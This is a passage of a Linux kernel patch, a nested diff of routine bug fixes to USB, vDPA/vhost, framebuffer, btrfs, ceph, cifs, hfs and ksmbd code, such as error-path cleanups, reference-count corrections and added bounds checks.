++static DEVICE_ATTR_RW(rfi_restriction_data_rate_base);
+ static DEVICE_ATTR_RO(ddr_data_rate_point_0);
+ static DEVICE_ATTR_RO(ddr_data_rate_point_1);
+ static DEVICE_ATTR_RO(ddr_data_rate_point_2);
+@@ -248,6 +251,7 @@ static struct attribute *dvfs_attrs[] = {
+ 	&dev_attr_rfi_restriction_run_busy.attr,
+ 	&dev_attr_rfi_restriction_err_code.attr,
+ 	&dev_attr_rfi_restriction_data_rate.attr,
++	&dev_attr_rfi_restriction_data_rate_base.attr,
+ 	&dev_attr_ddr_data_rate_point_0.attr,
+ 	&dev_attr_ddr_data_rate_point_1.attr,
+ 	&dev_attr_ddr_data_rate_point_2.attr,
+diff --git a/drivers/usb/dwc3/dwc3-xilinx.c b/drivers/usb/dwc3/dwc3-xilinx.c
+index 8607d4c23283c..0745e9f11b2ef 100644
+--- a/drivers/usb/dwc3/dwc3-xilinx.c
++++ b/drivers/usb/dwc3/dwc3-xilinx.c
+@@ -13,6 +13,7 @@
+ #include <linux/of.h>
+ #include <linux/platform_device.h>
+ #include <linux/dma-mapping.h>
++#include <linux/gpio/consumer.h>
+ #include <linux/of_gpio.h>
+ #include <linux/of_platform.h>
+ #include <linux/pm_runtime.h>
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 6d524fa764438..ed958da0e1c96 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -1717,6 +1717,7 @@ static int __dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force, bool int
+ 	else if (!ret)
+ 		dep->flags |= DWC3_EP_END_TRANSFER_PENDING;
+ 
++	dep->flags &= ~DWC3_EP_DELAY_STOP;
+ 	return ret;
+ }
+ 
+@@ -3722,8 +3723,10 @@ void dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force,
+ 	if (dep->number <= 1 && dwc->ep0state != EP0_DATA_PHASE)
+ 		return;
+ 
++	if (interrupt && (dep->flags & DWC3_EP_DELAY_STOP))
++		return;
++
+ 	if (!(dep->flags & DWC3_EP_TRANSFER_STARTED) ||
+-	    (dep->flags & DWC3_EP_DELAY_STOP) ||
+ 	    (dep->flags & DWC3_EP_END_TRANSFER_PENDING))
+ 		return;
+ 
+diff --git a/drivers/vdpa/mlx5/net/mlx5_vnet.c b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+index 90913365def43..444d6572b2d05 100644
+--- a/drivers/vdpa/mlx5/net/mlx5_vnet.c
++++ b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+@@ -1468,11 +1468,13 @@ static int mlx5_vdpa_add_mac_vlan_rules(struct mlx5_vdpa_net *ndev, u8 *mac,
+ 	dmac_v = MLX5_ADDR_OF(fte_match_param, headers_v, outer_headers.dmac_47_16);
+ 	eth_broadcast_addr(dmac_c);
+ 	ether_addr_copy(dmac_v, mac);
+-	MLX5_SET(fte_match_set_lyr_2_4, headers_c, cvlan_tag, 1);
++	if (ndev->mvdev.actual_features & BIT_ULL(VIRTIO_NET_F_CTRL_VLAN)) {
++		MLX5_SET(fte_match_set_lyr_2_4, headers_c, cvlan_tag, 1);
++		MLX5_SET_TO_ONES(fte_match_set_lyr_2_4, headers_c, first_vid);
++	}
+ 	if (tagged) {
+ 		MLX5_SET(fte_match_set_lyr_2_4, headers_v, cvlan_tag, 1);
+-		MLX5_SET_TO_ONES(fte_match_set_lyr_2_4, headers_c, first_vid);
+-		MLX5_SET(fte_match_set_lyr_2_4, headers_c, first_vid, vid);
++		MLX5_SET(fte_match_set_lyr_2_4, headers_v, first_vid, vid);
+ 	}
+ 	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_FWD_DEST;
+ 	dest.type = MLX5_FLOW_DESTINATION_TYPE_TIR;
+@@ -1684,7 +1686,7 @@ static virtio_net_ctrl_ack handle_ctrl_mac(struct mlx5_vdpa_dev *mvdev, u8 cmd)
+ 
+ 		/* Need recreate the flow table entry, so that the packet could forward back
+ 		 */
+-		mac_vlan_del(ndev, ndev->config.mac, 0, false);
++		mac_vlan_del(ndev, mac_back, 0, false);
+ 
+ 		if (mac_vlan_add(ndev, ndev->config.mac, 0, false)) {
+ 			mlx5_vdpa_warn(mvdev, "failed to insert forward rules, try to restore\n");
+diff --git a/drivers/vdpa/vdpa_sim/vdpa_sim.c b/drivers/vdpa/vdpa_sim/vdpa_sim.c
+index b071f0d842fba..cb88891b44a8c 100644
+--- a/drivers/vdpa/vdpa_sim/vdpa_sim.c
++++ b/drivers/vdpa/vdpa_sim/vdpa_sim.c
+@@ -67,8 +67,7 @@ static void vdpasim_queue_ready(struct vdpasim *vdpasim, unsigned int idx)
+ {
+ 	struct vdpasim_virtqueue *vq = &vdpasim->vqs[idx];
+ 
+-	vringh_init_iotlb(&vq->vring, vdpasim->dev_attr.supported_features,
+-			  VDPASIM_QUEUE_MAX, false,
++	vringh_init_iotlb(&vq->vring, vdpasim->features, vq->num, false,
+ 			  (struct vring_desc *)(uintptr_t)vq->desc_addr,
+ 			  (struct vring_avail *)
+ 			  (uintptr_t)vq->driver_addr,
+@@ -690,7 +689,9 @@ static void vdpasim_free(struct vdpa_device *vdpa)
+ 	}
+ 
+ 	kvfree(vdpasim->buffer);
+-	vhost_iotlb_free(vdpasim->iommu);
++	for (i = 0; i < vdpasim->dev_attr.nas; i++)
++		vhost_iotlb_reset(&vdpasim->iommu[i]);
++	kfree(vdpasim->iommu);
+ 	kfree(vdpasim->vqs);
+ 	kfree(vdpasim->config);
+ }
+diff --git a/drivers/vdpa/vdpa_sim/vdpa_sim_blk.c b/drivers/vdpa/vdpa_sim/vdpa_sim_blk.c
+index c6db1a1baf768..f745926237a88 100644
+--- a/drivers/vdpa/vdpa_sim/vdpa_sim_blk.c
++++ b/drivers/vdpa/vdpa_sim/vdpa_sim_blk.c
+@@ -427,8 +427,10 @@ static int __init vdpasim_blk_init(void)
+ 	int ret;
+ 
+ 	ret = device_register(&vdpasim_blk_mgmtdev);
+-	if (ret)
++	if (ret) {
++		put_device(&vdpasim_blk_mgmtdev);
+ 		return ret;
++	}
+ 
+ 	ret = vdpa_mgmtdev_register(&mgmt_dev);
+ 	if (ret)
+diff --git a/drivers/vdpa/vdpa_sim/vdpa_sim_net.c b/drivers/vdpa/vdpa_sim/vdpa_sim_net.c
+index c3cb225ea4693..11f5a121df243 100644
+--- a/drivers/vdpa/vdpa_sim/vdpa_sim_net.c
++++ b/drivers/vdpa/vdpa_sim/vdpa_sim_net.c
+@@ -305,8 +305,10 @@ static int __init vdpasim_net_init(void)
+ 	int ret;
+ 
+ 	ret = device_register(&vdpasim_net_mgmtdev);
+-	if (ret)
++	if (ret) {
++		put_device(&vdpasim_net_mgmtdev);
+ 		return ret;
++	}
+ 
+ 	ret = vdpa_mgmtdev_register(&mgmt_dev);
+ 	if (ret)
+diff --git a/drivers/vdpa/virtio_pci/vp_vdpa.c b/drivers/vdpa/virtio_pci/vp_vdpa.c
+index d448db0c4de3f..8fe267ca3e76f 100644
+--- a/drivers/vdpa/virtio_pci/vp_vdpa.c
++++ b/drivers/vdpa/virtio_pci/vp_vdpa.c
+@@ -647,7 +647,7 @@ static void vp_vdpa_remove(struct pci_dev *pdev)
+ 	mdev = vp_vdpa_mgtdev->mdev;
+ 	vp_modern_remove(mdev);
+ 	vdpa_mgmtdev_unregister(&vp_vdpa_mgtdev->mgtdev);
+-	kfree(&vp_vdpa_mgtdev->mgtdev.id_table);
++	kfree(vp_vdpa_mgtdev->mgtdev.id_table);
+ 	kfree(mdev);
+ 	kfree(vp_vdpa_mgtdev);
+ }
+diff --git a/drivers/vhost/vdpa.c b/drivers/vhost/vdpa.c
+index 166044642fd5c..ec32f785dfdec 100644
+--- a/drivers/vhost/vdpa.c
++++ b/drivers/vhost/vdpa.c
+@@ -65,6 +65,10 @@ static DEFINE_IDA(vhost_vdpa_ida);
+ 
+ static dev_t vhost_vdpa_major;
+ 
++static void vhost_vdpa_iotlb_unmap(struct vhost_vdpa *v,
++				   struct vhost_iotlb *iotlb, u64 start,
++				   u64 last, u32 asid);
++
+ static inline u32 iotlb_to_asid(struct vhost_iotlb *iotlb)
+ {
+ 	struct vhost_vdpa_as *as = container_of(iotlb, struct
+@@ -135,7 +139,7 @@ static int vhost_vdpa_remove_as(struct vhost_vdpa *v, u32 asid)
+ 		return -EINVAL;
+ 
+ 	hlist_del(&as->hash_link);
+-	vhost_iotlb_reset(&as->iotlb);
++	vhost_vdpa_iotlb_unmap(v, &as->iotlb, 0ULL, 0ULL - 1, asid);
+ 	kfree(as);
+ 
+ 	return 0;
+@@ -683,10 +687,20 @@ static long vhost_vdpa_unlocked_ioctl(struct file *filep,
+ 	mutex_unlock(&d->mutex);
+ 	return r;
+ }
++static void vhost_vdpa_general_unmap(struct vhost_vdpa *v,
++				     struct vhost_iotlb_map *map, u32 asid)
++{
++	struct vdpa_device *vdpa = v->vdpa;
++	const struct vdpa_config_ops *ops = vdpa->config;
++	if (ops->dma_map) {
++		ops->dma_unmap(vdpa, asid, map->start, map->size);
++	} else if (ops->set_map == NULL) {
++		iommu_unmap(v->domain, map->start, map->size);
++	}
++}
+ 
+-static void vhost_vdpa_pa_unmap(struct vhost_vdpa *v,
+-				struct vhost_iotlb *iotlb,
+-				u64 start, u64 last)
++static void vhost_vdpa_pa_unmap(struct vhost_vdpa *v, struct vhost_iotlb *iotlb,
++				u64 start, u64 last, u32 asid)
+ {
+ 	struct vhost_dev *dev = &v->vdev;
+ 	struct vhost_iotlb_map *map;
+@@ -703,13 +717,13 @@ static void vhost_vdpa_pa_unmap(struct vhost_vdpa *v,
+ 			unpin_user_page(page);
+ 		}
+ 		atomic64_sub(PFN_DOWN(map->size), &dev->mm->pinned_vm);
++		vhost_vdpa_general_unmap(v, map, asid);
+ 		vhost_iotlb_map_free(iotlb, map);
+ 	}
+ }
+ 
+-static void vhost_vdpa_va_unmap(struct vhost_vdpa *v,
+-				struct vhost_iotlb *iotlb,
+-				u64 start, u64 last)
++static void vhost_vdpa_va_unmap(struct vhost_vdpa *v, struct vhost_iotlb *iotlb,
++				u64 start, u64 last, u32 asid)
+ {
+ 	struct vhost_iotlb_map *map;
+ 	struct vdpa_map_file *map_file;
+@@ -718,20 +732,21 @@ static void vhost_vdpa_va_unmap(struct vhost_vdpa *v,
+ 		map_file = (struct vdpa_map_file *)map->opaque;
+ 		fput(map_file->file);
+ 		kfree(map_file);
++		vhost_vdpa_general_unmap(v, map, asid);
+ 		vhost_iotlb_map_free(iotlb, map);
+ 	}
+ }
+ 
+ static void vhost_vdpa_iotlb_unmap(struct vhost_vdpa *v,
+-				   struct vhost_iotlb *iotlb,
+-				   u64 start, u64 last)
++				   struct vhost_iotlb *iotlb, u64 start,
++				   u64 last, u32 asid)
+ {
+ 	struct vdpa_device *vdpa = v->vdpa;
+ 
+ 	if (vdpa->use_va)
+-		return vhost_vdpa_va_unmap(v, iotlb, start, last);
++		return vhost_vdpa_va_unmap(v, iotlb, start, last, asid);
+ 
+-	return vhost_vdpa_pa_unmap(v, iotlb, start, last);
++	return vhost_vdpa_pa_unmap(v, iotlb, start, last, asid);
+ }
+ 
+ static int perm_to_iommu_flags(u32 perm)
+@@ -798,17 +813,12 @@ static void vhost_vdpa_unmap(struct vhost_vdpa *v,
+ 	const struct vdpa_config_ops *ops = vdpa->config;
+ 	u32 asid = iotlb_to_asid(iotlb);
+ 
+-	vhost_vdpa_iotlb_unmap(v, iotlb, iova, iova + size - 1);
++	vhost_vdpa_iotlb_unmap(v, iotlb, iova, iova + size - 1, asid);
+ 
+-	if (ops->dma_map) {
+-		ops->dma_unmap(vdpa, asid, iova, size);
+-	} else if (ops->set_map) {
++	if (ops->set_map) {
+ 		if (!v->in_batch)
+ 			ops->set_map(vdpa, asid, iotlb);
+-	} else {
+-		iommu_unmap(v->domain, iova, size);
+ 	}
+-
+ 	/* If we are in the middle of batch processing, delay the free
+ 	 * of AS until BATCH_END.
+ 	 */
+@@ -1162,14 +1172,14 @@ static void vhost_vdpa_cleanup(struct vhost_vdpa *v)
+ 	struct vhost_vdpa_as *as;
+ 	u32 asid;
+ 
+-	vhost_dev_cleanup(&v->vdev);
+-	kfree(v->vdev.vqs);
+-
+ 	for (asid = 0; asid < v->vdpa->nas; asid++) {
+ 		as = asid_to_as(v, asid);
+ 		if (as)
+ 			vhost_vdpa_remove_as(v, asid);
+ 	}
++
++	vhost_dev_cleanup(&v->vdev);
++	kfree(v->vdev.vqs);
+ }
+ 
+ static int vhost_vdpa_open(struct inode *inode, struct file *filep)
+diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
+index 40097826cff0b..3c2359570df9d 100644
+--- a/drivers/vhost/vhost.c
++++ b/drivers/vhost/vhost.c
+@@ -2053,7 +2053,7 @@ static int translate_desc(struct vhost_virtqueue *vq, u64 addr, u32 len,
+ 	struct vhost_dev *dev = vq->dev;
+ 	struct vhost_iotlb *umem = dev->iotlb ? dev->iotlb : dev->umem;
+ 	struct iovec *_iov;
+-	u64 s = 0;
++	u64 s = 0, last = addr + len - 1;
+ 	int ret = 0;
+ 
+ 	while ((u64)len > s) {
+@@ -2063,7 +2063,7 @@ static int translate_desc(struct vhost_virtqueue *vq, u64 addr, u32 len,
+ 			break;
+ 		}
+ 
+-		map = vhost_iotlb_itree_first(umem, addr, addr + len - 1);
++		map = vhost_iotlb_itree_first(umem, addr, last);
+ 		if (map == NULL || map->start > addr) {
+ 			if (umem != dev->iotlb) {
+ 				ret = -EFAULT;
+diff --git a/drivers/vhost/vringh.c b/drivers/vhost/vringh.c
+index 11f59dd06a74e..828c293065657 100644
+--- a/drivers/vhost/vringh.c
++++ b/drivers/vhost/vringh.c
+@@ -1102,7 +1102,7 @@ static int iotlb_translate(const struct vringh *vrh,
+ 	struct vhost_iotlb_map *map;
+ 	struct vhost_iotlb *iotlb = vrh->iotlb;
+ 	int ret = 0;
+-	u64 s = 0;
++	u64 s = 0, last = addr + len - 1;
+ 
+ 	spin_lock(vrh->iotlb_lock);
+ 
+@@ -1114,8 +1114,7 @@ static int iotlb_translate(const struct vringh *vrh,
+ 			break;
+ 		}
+ 
+-		map = vhost_iotlb_itree_first(iotlb, addr,
+-					      addr + len - 1);
++		map = vhost_iotlb_itree_first(iotlb, addr, last);
+ 		if (!map || map->start > addr) {
+ 			ret = -EINVAL;
+ 			break;
+diff --git a/drivers/vhost/vsock.c b/drivers/vhost/vsock.c
+index 5703775af1297..10a7d23731fef 100644
+--- a/drivers/vhost/vsock.c
++++ b/drivers/vhost/vsock.c
+@@ -959,7 +959,14 @@ static int __init vhost_vsock_init(void)
+ 				  VSOCK_TRANSPORT_F_H2G);
+ 	if (ret < 0)
+ 		return ret;
+-	return misc_register(&vhost_vsock_misc);
++
++	ret = misc_register(&vhost_vsock_misc);
++	if (ret) {
++		vsock_core_unregister(&vhost_transport.transport);
++		return ret;
++	}
++
++	return 0;
+ };
+ 
+ static void __exit vhost_vsock_exit(void)
+diff --git a/drivers/video/fbdev/matrox/matroxfb_base.c b/drivers/video/fbdev/matrox/matroxfb_base.c
+index 775d34115e2df..82f53e998b018 100644
+--- a/drivers/video/fbdev/matrox/matroxfb_base.c
++++ b/drivers/video/fbdev/matrox/matroxfb_base.c
+@@ -1378,8 +1378,8 @@ static struct video_board vbG200 = {
+ 	.lowlevel = &matrox_G100
+ };
+ static struct video_board vbG200eW = {
+-	.maxvram = 0x100000,
+-	.maxdisplayable = 0x800000,
++	.maxvram = 0x1000000,
++	.maxdisplayable = 0x0800000,
+ 	.accelID = FB_ACCEL_MATROX_MGAG200,
+ 	.lowlevel = &matrox_G100
+ };
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index d99bf7c646110..6538f52262ca4 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -3296,6 +3296,8 @@ out:
+ /*
+  * Do various sanity and dependency checks of different features.
+  *
++ * @is_rw_mount:	If the mount is read-write.
++ *
+  * This is the place for less strict checks (like for subpage or artificial
+  * feature dependencies).
+  *
+@@ -3306,7 +3308,7 @@ out:
+  * (space cache related) can modify on-disk format like free space tree and
+  * screw up certain feature dependencies.
+  */
+-int btrfs_check_features(struct btrfs_fs_info *fs_info, struct super_block *sb)
++int btrfs_check_features(struct btrfs_fs_info *fs_info, bool is_rw_mount)
+ {
+ 	struct btrfs_super_block *disk_super = fs_info->super_copy;
+ 	u64 incompat = btrfs_super_incompat_flags(disk_super);
+@@ -3345,7 +3347,7 @@ int btrfs_check_features(struct btrfs_fs_info *fs_info, struct super_block *sb)
+ 	if (btrfs_super_nodesize(disk_super) > PAGE_SIZE)
+ 		incompat |= BTRFS_FEATURE_INCOMPAT_BIG_METADATA;
+ 
+-	if (compat_ro_unsupp && !sb_rdonly(sb)) {
++	if (compat_ro_unsupp && is_rw_mount) {
+ 		btrfs_err(fs_info,
+ 	"cannot mount read-write because of unknown compat_ro features (0x%llx)",
+ 		       compat_ro);
+@@ -3548,7 +3550,7 @@ int __cold open_ctree(struct super_block *sb, struct btrfs_fs_devices *fs_device
+ 		goto fail_alloc;
+ 	}
+ 
+-	ret = btrfs_check_features(fs_info, sb);
++	ret = btrfs_check_features(fs_info, !sb_rdonly(sb));
+ 	if (ret < 0) {
+ 		err = ret;
+ 		goto fail_alloc;
+diff --git a/fs/btrfs/disk-io.h b/fs/btrfs/disk-io.h
+index 9fa923e005a3a..7322af63c0cc7 100644
+--- a/fs/btrfs/disk-io.h
++++ b/fs/btrfs/disk-io.h
+@@ -50,7 +50,7 @@ int __cold open_ctree(struct super_block *sb,
+ void __cold close_ctree(struct btrfs_fs_info *fs_info);
+ int btrfs_validate_super(struct btrfs_fs_info *fs_info,
+ 			 struct btrfs_super_block *sb, int mirror_num);
+-int btrfs_check_features(struct btrfs_fs_info *fs_info, struct super_block *sb);
++int btrfs_check_features(struct btrfs_fs_info *fs_info, bool is_rw_mount);
+ int write_all_supers(struct btrfs_fs_info *fs_info, int max_mirrors);
+ struct btrfs_super_block *btrfs_read_dev_super(struct block_device *bdev);
+ struct btrfs_super_block *btrfs_read_dev_one_super(struct block_device *bdev,
+diff --git a/fs/btrfs/extent-io-tree.c b/fs/btrfs/extent-io-tree.c
+index 7b93719a486c5..09ae0e73e6805 100644
+--- a/fs/btrfs/extent-io-tree.c
++++ b/fs/btrfs/extent-io-tree.c
+@@ -1507,7 +1507,7 @@ u64 count_range_bits(struct extent_io_tree *tree,
+ 	u64 last = 0;
+ 	int found = 0;
+ 
+-	if (WARN_ON(search_end <= cur_start))
++	if (WARN_ON(search_end < cur_start))
+ 		return 0;
+ 
+ 	spin_lock(&tree->lock);
+diff --git a/fs/btrfs/extent_io.c b/fs/btrfs/extent_io.c
+index 4dcf22e051ff8..acb3c5c3b0251 100644
+--- a/fs/btrfs/extent_io.c
++++ b/fs/btrfs/extent_io.c
+@@ -580,7 +580,16 @@ static int repair_io_failure(struct btrfs_fs_info *fs_info, u64 ino, u64 start,
+ 				      &map_length, &bioc, mirror_num);
+ 		if (ret)
+ 			goto out_counter_dec;
+-		BUG_ON(mirror_num != bioc->mirror_num);
++		/*
++		 * This happens when dev-replace is also running, and the
++		 * mirror_num indicates the dev-replace target.
++		 *
++		 * In this case, we don't need to do anything, as the read
++		 * error just means the replace progress hasn't reached our
++		 * read range, and later replace routine would handle it well.
++		 */
++		if (mirror_num != bioc->mirror_num)
++			goto out_counter_dec;
+ 	}
+ 
+ 	sector = bioc->stripes[bioc->mirror_num - 1].physical >> 9;
+diff --git a/fs/btrfs/file.c b/fs/btrfs/file.c
+index ed4e1c3705d0a..9bef8eaa074a0 100644
+--- a/fs/btrfs/file.c
++++ b/fs/btrfs/file.c
+@@ -3671,7 +3671,7 @@ bool btrfs_find_delalloc_in_range(struct btrfs_inode *inode, u64 start, u64 end,
+ 	u64 prev_delalloc_end = 0;
+ 	bool ret = false;
+ 
+-	while (cur_offset < end) {
++	while (cur_offset <= end) {
+ 		u64 delalloc_start;
+ 		u64 delalloc_end;
+ 		bool delalloc;
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 5ba2e810dc6e0..fd1902573cde3 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -3750,13 +3750,10 @@ static long btrfs_ioctl_dev_info(struct btrfs_fs_info *fs_info,
+ 	di_args->bytes_used = btrfs_device_get_bytes_used(dev);
+ 	di_args->total_bytes = btrfs_device_get_total_bytes(dev);
+ 	memcpy(di_args->uuid, dev->uuid, sizeof(di_args->uuid));
+-	if (dev->name) {
+-		strncpy(di_args->path, rcu_str_deref(dev->name),
+-				sizeof(di_args->path) - 1);
+-		di_args->path[sizeof(di_args->path) - 1] = 0;
+-	} else {
++	if (dev->name)
++		strscpy(di_args->path, rcu_str_deref(dev->name), sizeof(di_args->path));
++	else
+ 		di_args->path[0] = '\0';
+-	}
+ 
+ out:
+ 	rcu_read_unlock();
+diff --git a/fs/btrfs/rcu-string.h b/fs/btrfs/rcu-string.h
+index 5c1a617eb25de..5c2b66d155ef7 100644
+--- a/fs/btrfs/rcu-string.h
++++ b/fs/btrfs/rcu-string.h
+@@ -18,7 +18,11 @@ static inline struct rcu_string *rcu_string_strdup(const char *src, gfp_t mask)
+ 					 (len * sizeof(char)), mask);
+ 	if (!ret)
+ 		return ret;
+-	strncpy(ret->str, src, len);
++	/* Warn if the source got unexpectedly truncated. */
++	if (WARN_ON(strscpy(ret->str, src, len) < 0)) {
++		kfree(ret);
++		return NULL;
++	}
+ 	return ret;
+ }
+ 
+diff --git a/fs/btrfs/super.c b/fs/btrfs/super.c
+index 5942b93840884..abfd7c897075a 100644
+--- a/fs/btrfs/super.c
++++ b/fs/btrfs/super.c
+@@ -2014,7 +2014,7 @@ static int btrfs_remount(struct super_block *sb, int *flags, char *data)
+ 	if (ret)
+ 		goto restore;
+ 
+-	ret = btrfs_check_features(fs_info, sb);
++	ret = btrfs_check_features(fs_info, !(*flags & SB_RDONLY));
+ 	if (ret < 0)
+ 		goto restore;
+ 
+diff --git a/fs/btrfs/tree-defrag.c b/fs/btrfs/tree-defrag.c
+index b6cf39f4e7e48..072ab9a1374b5 100644
+--- a/fs/btrfs/tree-defrag.c
++++ b/fs/btrfs/tree-defrag.c
+@@ -31,8 +31,10 @@ int btrfs_defrag_leaves(struct btrfs_trans_handle *trans,
+ 		goto out;
+ 
+ 	path = btrfs_alloc_path();
+-	if (!path)
+-		return -ENOMEM;
++	if (!path) {
++		ret = -ENOMEM;
++		goto out;
++	}
+ 
+ 	level = btrfs_header_level(root->node);
+ 
+diff --git a/fs/ceph/caps.c b/fs/ceph/caps.c
+index e54814d0c2f7b..cd69bf267d1b1 100644
+--- a/fs/ceph/caps.c
++++ b/fs/ceph/caps.c
+@@ -2915,7 +2915,7 @@ int ceph_get_caps(struct file *filp, int need, int want, loff_t endoff, int *got
+ 
+ 	while (true) {
+ 		flags &= CEPH_FILE_MODE_MASK;
+-		if (atomic_read(&fi->num_locks))
++		if (vfs_inode_has_locks(inode))
+ 			flags |= CHECK_FILELOCK;
+ 		_got = 0;
+ 		ret = try_get_cap_refs(inode, need, want, endoff,
+diff --git a/fs/ceph/locks.c b/fs/ceph/locks.c
+index 3e2843e86e274..b191426bf880c 100644
+--- a/fs/ceph/locks.c
++++ b/fs/ceph/locks.c
+@@ -32,18 +32,14 @@ void __init ceph_flock_init(void)
+ 
+ static void ceph_fl_copy_lock(struct file_lock *dst, struct file_lock *src)
+ {
+-	struct ceph_file_info *fi = dst->fl_file->private_data;
+ 	struct inode *inode = file_inode(dst->fl_file);
+ 	atomic_inc(&ceph_inode(inode)->i_filelock_ref);
+-	atomic_inc(&fi->num_locks);
+ }
+ 
+ static void ceph_fl_release_lock(struct file_lock *fl)
+ {
+-	struct ceph_file_info *fi = fl->fl_file->private_data;
+ 	struct inode *inode = file_inode(fl->fl_file);
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+-	atomic_dec(&fi->num_locks);
+ 	if (atomic_dec_and_test(&ci->i_filelock_ref)) {
+ 		/* clear error when all locks are released */
+ 		spin_lock(&ci->i_ceph_lock);
+diff --git a/fs/ceph/super.h b/fs/ceph/super.h
+index 40630e6f691c7..ae4126f634101 100644
+--- a/fs/ceph/super.h
++++ b/fs/ceph/super.h
+@@ -788,7 +788,6 @@ struct ceph_file_info {
+ 	struct list_head rw_contexts;
+ 
+ 	u32 filp_gen;
+-	atomic_t num_locks;
+ };
+ 
+ struct ceph_dir_file_info {
+diff --git a/fs/cifs/sess.c b/fs/cifs/sess.c
+index 9e7d9f0baa18a..0b842a07e1579 100644
+--- a/fs/cifs/sess.c
++++ b/fs/cifs/sess.c
+@@ -292,9 +292,10 @@ cifs_chan_update_iface(struct cifs_ses *ses, struct TCP_Server_Info *server)
+ 			continue;
+ 		}
+ 		kref_get(&iface->refcount);
++		break;
+ 	}
+ 
+-	if (!list_entry_is_head(iface, &ses->iface_list, iface_head)) {
++	if (list_entry_is_head(iface, &ses->iface_list, iface_head)) {
+ 		rc = 1;
+ 		iface = NULL;
+ 		cifs_dbg(FYI, "unable to find a suitable iface\n");
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index b24e68b5ccd61..8da98918cf86b 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -530,7 +530,6 @@ parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+ 	p = buf;
+ 
+ 	spin_lock(&ses->iface_lock);
+-	ses->iface_count = 0;
+ 	/*
+ 	 * Go through iface_list and do kref_put to remove
+ 	 * any unused ifaces. ifaces in use will be removed
+@@ -540,6 +539,7 @@ parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+ 				 iface_head) {
+ 		iface->is_active = 0;
+ 		kref_put(&iface->refcount, release_iface);
++		ses->iface_count--;
+ 	}
+ 	spin_unlock(&ses->iface_lock);
+ 
+@@ -618,6 +618,7 @@ parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+ 				/* just get a ref so that it doesn't get picked/freed */
+ 				iface->is_active = 1;
+ 				kref_get(&iface->refcount);
++				ses->iface_count++;
+ 				spin_unlock(&ses->iface_lock);
+ 				goto next_iface;
+ 			} else if (ret < 0) {
+diff --git a/fs/hfs/inode.c b/fs/hfs/inode.c
+index a0746be3c1de7..80d17c520d0ba 100644
+--- a/fs/hfs/inode.c
++++ b/fs/hfs/inode.c
+@@ -458,15 +458,16 @@ int hfs_write_inode(struct inode *inode, struct writeback_control *wbc)
+ 		/* panic? */
+ 		return -EIO;
+ 
++	res = -EIO;
+ 	if (HFS_I(main_inode)->cat_key.CName.len > HFS_NAMELEN)
+-		return -EIO;
++		goto out;
+ 	fd.search_key->cat = HFS_I(main_inode)->cat_key;
+ 	if (hfs_brec_find(&fd))
+-		/* panic? */
+ 		goto out;
+ 
+ 	if (S_ISDIR(main_inode->i_mode)) {
+-		WARN_ON(fd.entrylength < sizeof(struct hfs_cat_dir));
++		if (fd.entrylength < sizeof(struct hfs_cat_dir))
++			goto out;
+ 		hfs_bnode_read(fd.bnode, &rec, fd.entryoffset,
+ 			   sizeof(struct hfs_cat_dir));
+ 		if (rec.type != HFS_CDR_DIR ||
+@@ -479,6 +480,8 @@ int hfs_write_inode(struct inode *inode, struct writeback_control *wbc)
+ 		hfs_bnode_write(fd.bnode, &rec, fd.entryoffset,
+ 			    sizeof(struct hfs_cat_dir));
+ 	} else if (HFS_IS_RSRC(inode)) {
++		if (fd.entrylength < sizeof(struct hfs_cat_file))
++			goto out;
+ 		hfs_bnode_read(fd.bnode, &rec, fd.entryoffset,
+ 			       sizeof(struct hfs_cat_file));
+ 		hfs_inode_write_fork(inode, rec.file.RExtRec,
+@@ -486,7 +489,8 @@ int hfs_write_inode(struct inode *inode, struct writeback_control *wbc)
+ 		hfs_bnode_write(fd.bnode, &rec, fd.entryoffset,
+ 				sizeof(struct hfs_cat_file));
+ 	} else {
+-		WARN_ON(fd.entrylength < sizeof(struct hfs_cat_file));
++		if (fd.entrylength < sizeof(struct hfs_cat_file))
++			goto out;
+ 		hfs_bnode_read(fd.bnode, &rec, fd.entryoffset,
+ 			   sizeof(struct hfs_cat_file));
+ 		if (rec.type != HFS_CDR_FIL ||
+@@ -503,9 +507,10 @@ int hfs_write_inode(struct inode *inode, struct writeback_control *wbc)
+ 		hfs_bnode_write(fd.bnode, &rec, fd.entryoffset,
+ 			    sizeof(struct hfs_cat_file));
+ 	}
++	res = 0;
+ out:
+ 	hfs_find_exit(&fd);
+-	return 0;
++	return res;
+ }
+ 
+ static struct dentry *hfs_file_lookup(struct inode *dir, struct dentry *dentry,
+diff --git a/fs/ksmbd/auth.c b/fs/ksmbd/auth.c
+index 2a39ffb8423b7..6e61b5bc7d86e 100644
+--- a/fs/ksmbd/auth.c
++++ b/fs/ksmbd/auth.c
+@@ -322,7 +322,8 @@ int ksmbd_decode_ntlmssp_auth_blob(struct authenticate_message *authblob,
+ 	dn_off = le32_to_cpu(authblob->DomainName.BufferOffset);
+ 	dn_len = le16_to_cpu(authblob->DomainName.Length);
+ 
+-	if (blob_len < (u64)dn_off + dn_len || blob_len < (u64)nt_off + nt_len)
++	if (blob_len < (u64)dn_off + dn_len || blob_len < (u64)nt_off + nt_len ||
++	    nt_len < CIFS_ENCPWD_SIZE)
+ 		return -EINVAL;
+ 
+ 	/* TODO : use domain name that imported from configuration file */
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index 12be8386446a3..fd0a288af299e 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
